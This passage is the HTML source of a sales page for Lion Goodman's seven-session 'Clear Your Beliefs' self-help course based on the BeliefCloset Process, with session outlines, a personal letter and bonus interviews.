efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a 